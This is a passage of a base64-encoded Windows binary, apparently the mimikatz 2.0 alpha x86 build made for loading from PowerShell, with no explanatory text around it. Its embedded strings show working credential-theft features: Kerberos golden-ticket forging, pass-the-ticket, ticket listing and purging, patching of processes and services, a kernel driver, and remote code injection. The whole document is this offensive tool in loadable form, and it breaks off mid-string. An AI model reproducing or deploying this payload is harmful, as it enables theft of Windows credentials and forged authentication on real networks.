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YAAAABQAAAAYAAAABAAAACAAAAAcAAAAAAAAAbNABEGjQARBI0AEQaNABEDDQARAY0AEQCNABEPTPARDkzwEQ0M8BELTPARCozwEQlM8BEIDPARBozwEQVM8BEBgAGgA8zAEQ3EwAENS0ARCktAEQNFEAEJi0ARB4tAEQwE8AEHC0ARBEtAEQR08AEDi0ARAYtAEQz1MAEAi0ARDgswEQ2F0AENSzARCoswEQMGMAEKCzARB0swEQVWMAEGizARAgswEQELUBEOC0ARDctAEQCAAAAECiARBnTAAQmEwAEFwALwA6ACoAPwAiADwAPgB8AAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBrAGUAcgBuAGUAbABfAGkAbwBjAHQAbABfAGgAYQBuAGQAbABlACAAOwAgAEQAZQB2AGkAYwBlAEkAbwBDAG8AbgB0AHIAbwBsACAAKAAwAHgAJQAwADgAeAApACAAOgAgADAAeAAlADAAOAB4AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBrAGUAcgBuAGUAbABfAGkAbwBjAHQAbAAgADsAIABDAHIAZQBhAHQAZQBGAGkAbABlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAFwAXAAuAFwAbQBpAG0AaQBkAHIAdgAAAGEAAAAiACUAcwAiACAAcwBlAHIAdgBpAGMAZQAgAHAAYQB0AGMAaABlAGQACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaABfAGcAZQBuAGUAcgBpAGMAUAByAG8AYwBlAHMAcwBPAHIAUwBlAHIAdgBpAGMAZQBGAHIAbwBtAEIAdQBpAGwAZAAgADsAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAXwBnAGUAbgBlAHIAaQBjAFAAcgBvAGMAZQBzAHMATwByAFMAZQByAHYAaQBjAGUARgByAG8AbQBCAHUAaQBsAGQAIAA7ACAAawB1AGwAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAHQAVgBlAHIAeQBCAGEAcwBpAGMATQBvAGQAdQBsAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuAHMARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAXwBnAGUAbgBlAHIAaQBjAFAAcgBvAGMAZQBzAHMATwByAFMAZQByAHYAaQBjAGUARgByAG8AbQBCAHUAaQBsAGQAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaABfAGcAZQBuAGUAcgBpAGMAUAByAG8AYwBlAHMAcwBPAHIAUwBlAHIAdgBpAGMAZQBGAHIAbwBtAEIAdQBpAGwAZAAgADsAIABTAGUAcgB2AGkAYwBlACAAaQBzACAAbgBvAHQAIAByAHUAbgBuAGkAbgBnAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAXwBnAGUAbgBlAHIAaQBjAFAAcgBvAGMAZQBzAHMATwByAFMAZQByAHYAaQBjAGUARgByAG8AbQBCAHUAaQBsAGQAIAA7ACAAawB1AGwAbABfAG0AXwBzAGUAcgB2AGkAYwBlAF8AZwBlAHQAVQBuAGkAcQB1AGUARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAXwBnAGUAbgBlAHIAaQBjAFAAcgBvAGMAZQBzAHMATwByAFMAZQByAHYAaQBjAGUARgByAG8AbQBCAHUAaQBsAGQAIAA7ACAASQBuAGMAbwByAHIAZQBjAHQAIAB2AGUAcgBzAGkAbwBuACAAaQBuACAAcgBlAGYAZQByAGUAbgBjAGUAcwAKAAAAAABRAFcATwBSAEQAAABSAEUAUwBPAFUAUgBDAEUAXwBSAEUAUQBVAEkAUgBFAE0ARQBOAFQAUwBfAEwASQBTAFQAAAAAAEYAVQBMAEwAXwBSAEUAUwBPAFUAUgBDAEUAXwBEAEUAUwBDAFIASQBQAFQATwBSAAAAAABSAEUAUwBPAFUAUgBDAEUAXwBMAEkAUwBUAAAATQBVAEwAVABJAF8AUwBaAAAAAABMAEkATgBLAAAAAABEAFcATwBSAEQAXwBCAEkARwBfAEUATgBEAEkAQQBOAAAAAABEAFcATwBSAEQAAABCAEkATgBBAFIAWQAAAAAARQBYAFAAQQBOAEQAXwBTAFoAAABTAFoAAAAAAE4ATwBOAEUAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAZQBtAG8AdABlAGwAaQBiAF8AYwByAGUAYQB0AGUAIAA7ACAAUgB0AGwAQwByAGUAYQB0AGUAVQBzAGUAcgBUAGgAcgBlAGEAZAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBlAG0AbwB0AGUAbABpAGIAXwBjAHIAZQBhAHQAZQAgADsAIABDAHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABUAGgAIABAACAAJQBwAAoARABhACAAQAAgACUAcAAKAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAZQBtAG8AdABlAGwAaQBiAF8AYwByAGUAYQB0AGUAIAA7ACAAawB1AGwAbABfAG0AXwBrAGUAcgBuAGUAbABfAGkAbwBjAHQAbABfAGgAYQBuAGQAbABlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAZQBtAG8AdABlAGwAaQBiAF8AQwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAQwBvAGQAZQBXAGkAdAB0AGgAUABhAHQAdABlAHIAbgBSAGUAcABsAGEAYwBlACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBjAG8AcAB5ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAGUAbQBvAHQAZQBsAGkAYgBfAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAEMAbwBkAGUAVwBpAHQAdABoAFAAYQB0AHQAZQByAG4AUgBlAHAAbABhAGMAZQAgADsAIABrAHUAbABsAF8AbQBfAG0AZQBtAG8AcgB5AF8AYQBsAGwAbwBjACAALwAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgARQB4ACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAZQBtAG8AdABlAGwAaQBiAF8AQwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAQwBvAGQAZQBXAGkAdAB0AGgAUABhAHQAdABlAHIAbgBSAGUAcABsAGEAYwBlACAAOwAgAE4AbwAgAGIAdQBmAGYAZQByACAAPwAKAAAAUwBlAHIAdgBpAGMAZQBzAEEAYwB0AGkAdgBlAAAAAABcAHgAJQAwADIAeAAAAAAAMAB4ACUAMAAyAHgALAAgAAAAAAAlADAAMgB4ACAAAAAlADAAMgB4AAAAAAAKAAAAJQBzACAAAAAlAHMAAAAAACUAdwBaAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcwB0AHIAaQBuAGcAXwBkAGkAcwBwAGwAYQB5AFMASQBEACAAOwAgAEMAbwBuAHYAZQByAHQAUwBpAGQAVABvAFMAdAByAGkAbgBnAFMAaQBkACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAFQAbwBrAGUAbgAAAAoAIAAgAC4AIwAjACMAIwAjAC4AIAAgACAAbQBpAG0AaQBrAGEAdAB6ACAAMgAuADAAIABhAGwAcABoAGEAIAAoAHgAOAA2ACkAIAByAGUAbABlAGEAcwBlACAAIgBLAGkAdwBpACAAZQBuACAAQwAiACAAKABGAGUAYgAgADEANgAgADIAMAAxADUAIAAyADIAOgAxADcAOgA1ADIAKQAKACAALgAjACMAIABeACAAIwAjAC4AIAAgAAoAIAAjACMAIAAvACAAXAAgACMAIwAgACAALwAqACAAKgAgACoACgAgACMAIwAgAFwAIAAvACAAIwAjACAAIAAgAEIAZQBuAGoAYQBtAGkAbgAgAEQARQBMAFAAWQAgAGAAZwBlAG4AdABpAGwAawBpAHcAaQBgACAAKAAgAGIAZQBuAGoAYQBtAGkAbgBAAGcAZQBuAHQAaQBsAGsAaQB3AGkALgBjAG8AbQAgACkACgAgACcAIwAjACAAdgAgACMAIwAnACAAIAAgAGgAdAB0AHAAOgAvAC8AYgBsAG8AZwAuAGcAZQBuAHQAaQBsAGsAaQB3AGkALgBjAG8AbQAvAG0AaQBtAGkAawBhAHQAegAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACgAbwBlAC4AZQBvACkACgAgACAAJwAjACMAIwAjACMAJwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHcAaQB0AGgAIAAlADIAdQAgAG0AbwBkAHUAbABlAHMAIAAqACAAKgAgACoALwAKAAoAAAAAAAoAbQBpAG0AaQBrAGEAdAB6ACgAcABvAHcAZQByAHMAaABlAGwAbAApACAAIwAgACUAcwAKAAAASQBOAEkAVAAAAAAAQwBMAEUAQQBOAAAAPgA+AD4AIAAlAHMAIABvAGYAIAAnACUAcwAnACAAbQBvAGQAdQBsAGUAIABmAGEAaQBsAGUAZAAgADoAIAAlADAAOAB4AAoAAAAAADoAOgAAAAAAAAAAAEUAUgBSAE8AUgAgAG0AaQBtAGkAawBhAHQAegBfAGQAbwBMAG8AYwBhAGwAIAA7ACAAIgAlAHMAIgAgAG0AbwBkAHUAbABlACAAbgBvAHQAIABmAG8AdQBuAGQAIAAhAAoAAAAKACUAMQA2AHMAAAAgACAALQAgACAAJQBzAAAAIAAgAFsAJQBzAF0AAAAAAEUAUgBSAE8AUgAgAG0AaQBtAGkAawBhAHQAegBfAGQAbwBMAG8AYwBhAGwAIAA7ACAAIgAlAHMAIgAgAGMAbwBtAG0AYQBuAGQAIABvAGYAIAAiACUAcwAiACAAbQBvAGQAdQBsAGUAIABuAG8AdAAgAGYAbwB1AG4AZAAgACEACgAAAAoATQBvAGQAdQBsAGUAIAA6AAkAJQBzAAAAAAAKAEYAdQBsAGwAIABuAGEAbQBlACAAOgAJACUAcwAAAAoARABlAHMAYwByAGkAcAB0AGkAbwBuACAAOgAJACUAcwAAAEtlcmJlcm9zAAAAAHUAcwBlAHIAAAAAAHMAZQByAHYAaQBjAGUAAAAAAAAATABpAHMAdAAgAHQAaQBjAGsAZQB0AHMAIABpAG4AIABNAEkAVAAvAEgAZQBpAG0AZABhAGwAbAAgAGMAYwBhAGMAaABlAAAAYwBsAGkAcwB0AAAAUABhAHMAcwAtAHQAaABlAC0AYwBjAGEAYwBoAGUAIABbAE4AVAA2AF0AAABwAHQAYwAAAEgAYQBzAGgAIABwAGEAcwBzAHcAbwByAGQAIAB0AG8AIABrAGUAeQBzAAAAaABhAHMAaAAAAAAAVwBpAGwAbAB5ACAAVwBvAG4AawBhACAAZgBhAGMAdABvAHIAeQAAAGcAbwBsAGQAZQBuAAAAAABQAHUAcgBnAGUAIAB0AGkAYwBrAGUAdAAoAHMAKQAAAHAAdQByAGcAZQAAAFIAZQB0AHIAaQBlAHYAZQAgAGMAdQByAHIAZQBuAHQAIABUAEcAVAAAAAAAdABnAHQAAABMAGkAcwB0ACAAdABpAGMAawBlAHQAKABzACkAAAAAAGwAaQBzAHQAAAAAAFAAYQBzAHMALQB0AGgAZQAtAHQAaQBjAGsAZQB0ACAAWwBOAFQAIAA2AF0AAAAAAHAAdAB0AAAAAAAAAEsAZQByAGIAZQByAG8AcwAgAHAAYQBjAGsAYQBnAGUAIABtAG8AZAB1AGwAZQAAAGsAZQByAGIAZQByAG8AcwAAAAAAAAAAACUAMwB1ACAALQAgAEQAaQByAGUAYwB0AG8AcgB5ACAAJwAlAHMAJwAgACgAKgAuAGsAaQByAGIAaQApAAoAAABcACoALgBrAGkAcgBiAGkAAAAAAFwAAAAgACAAIAAlADMAdQAgAC0AIABGAGkAbABlACAAJwAlAHMAJwAgADoAIAAAACUAMwB1ACAALQAgAEYAaQBsAGUAIAAnACUAcwAnACAAOgAgAAAAAABPAEsACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAHAAdAB0AF8AZgBpAGwAZQAgADsAIABMAHMAYQBDAGEAbABsAEsAZQByAGIAZQByAG8AcwBQAGEAYwBrAGEAZwBlACAAJQAwADgAeAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AcAB0AHQAXwBmAGkAbABlACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHIAZQBhAGQARABhAHQAYQAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBwAHQAdABfAGQAYQB0AGEAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUwB1AGIAbQBpAHQAVABpAGMAawBlAHQATQBlAHMAcwBhAGcAZQAgAC8AIABQAGEAYwBrAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AcAB0AHQAXwBkAGEAdABh